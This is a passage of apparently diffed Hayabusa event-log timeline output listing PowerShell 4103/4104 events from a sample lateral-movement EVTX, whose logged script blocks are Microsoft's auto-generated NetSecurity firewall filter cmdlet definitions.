($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Protocol}, [Parameter(ParameterSetName='ByQuery')] [Alias('DynamicTransport')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport[]] ${DynamicTarget}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Protocol') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Protocol}) $__cmdletization_queryBuilder.FilterByProperty('Protocol', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DynamicTarget') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DynamicTarget}) $__cmdletization_queryBuilder.FilterByProperty('DynamicTransport', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallPortFilter' -Alias '*' function Set-NetFirewallPortFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Protocol}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${IcmpType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('DynamicTransport')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport] ${DynamicTarget}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallPortFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallPortFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.434 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.434 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.435 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.436 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.472 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.472 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, 